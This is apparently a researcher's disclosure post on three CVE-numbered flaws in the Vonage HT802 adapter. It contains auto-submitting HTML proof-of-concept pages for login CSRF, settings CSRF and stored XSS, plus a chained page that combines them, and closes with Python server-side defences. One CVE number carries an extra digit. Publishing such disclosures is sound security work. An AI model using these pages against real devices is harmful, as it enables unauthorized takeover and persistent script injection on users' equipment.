Vonage HT802 – Multiple Vulnerabilities

I have disclosed three vulnerabilities in the Vonage (Grandstream) HT802.  I haven’t received a response from Vonage.  These vulnerabilities can be chained to inject persistent XSS in the Basic Settings screen of the device.

Update: I have received the following CVEs for these vulnerabilities:

1.) Cross-Site Request Forgery (CSRF) vulnerability in the login screen (/cgi-bin/login) allows an attacker to log into a target Vonage device. (CVE-2017-165635)

<html>
<body>
<form style="visibility: hidden" id="csrf" name="loginForm" action="http://192.168.0.160/cgi-bin/dologin" method="POST">
<input name="P2" type="password" value="123">
<input type="submit" name="Login" value="Login">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>

login-csrf.html

POC Verified in Firefox 56.0 on macOS

2.) Cross-Site Request Forgery (CSRF) vulnerability in the Basic Settings screen allows an attacker to modify system settings. (CVE-2017-16563)

<html>
<body>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="csrf-entry" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("xss-form").submit()
</script>
</body>
</html>

POC Verified in Firefox 56.0 on macOS

3.) Stored Cross-site scripting (XSS) vulnerability in cgi-bin/config2 in Vonage HT802 allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). (CVE-2017-16564)

<html>
<body>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="&quot;autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("xss-form").submit()
</script>
</body>
</html>

basic-settings.html

POC Verified in Firefox 56.0 on macOS

These three vulnerabilities can be chained to inject a persistent XSS payload into the Basic Settings page.

<html>
<body>
<iframe id="csrf" src="./login-csrf.html"></iframe>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="&quot;autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
var frame = document.getElementById('csrf');
frame.addEventListener("load", function() {
// Wait one second after the login frame has loaded, then submit the settings form.
window.setTimeout(function() { document.getElementById("xss-form").submit(); }, 1000);
});
</script>
</body>
</html>
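The server-side checks that would have stopped all three issues, written here as an added example in Python and not taken from the device's firmware: a random per-session anti-CSRF token plus an Origin/Referer check on /cgi-bin/update (in place of the fixed gnkey value the PoCs carry), and attribute encoding of P148 before it is rendered back into the Basic Settings form. The session store, the header and cookie dictionaries and the device host are constructed stand-ins.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Constructed stand-in for the device's per-session state; the firmware's
# real session handling is not described on the page.
SESSIONS = {}

def issue_csrf_token(session_id):
    """Mint a random token bound to one session; the form must echo it back."""
    token = secrets.token_hex(16)
    SESSIONS[session_id] = token
    return token

def origin_allowed(headers, device_host):
    """Accept a state-changing POST only if Origin (or Referer) names the
    device itself. A form auto-submitted from another site carries that
    site's origin and is rejected before the token is even looked at."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).netloc == device_host

def csrf_token_valid(session_id, submitted):
    """Constant-time comparison against the token bound to this session.
    A value that is the same on every device (the PoCs reuse gnkey=0b82)
    gives no protection, because any page can embed it."""
    expected = SESSIONS.get(session_id)
    return (expected is not None and submitted is not None
            and hmac.compare_digest(expected, submitted))

def authorize_update(headers, cookies, form, device_host="192.168.0.160"):
    """Gate for /cgi-bin/update: known session, same origin, valid token."""
    session_id = cookies.get("session")
    return (session_id in SESSIONS
            and origin_allowed(headers, device_host)
            and csrf_token_valid(session_id, form.get("csrf_token")))

def render_p148(stored_value):
    """Render the stored DHCP vendor class ID into the Basic Settings form
    with the value attribute-encoded, so a stored double quote becomes
    &quot; and cannot close the attribute to add an event handler."""
    safe = html.escape(stored_value, quote=True)
    return '<input name="P148" value="%s" maxlength="32" type="text">' % safe
```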
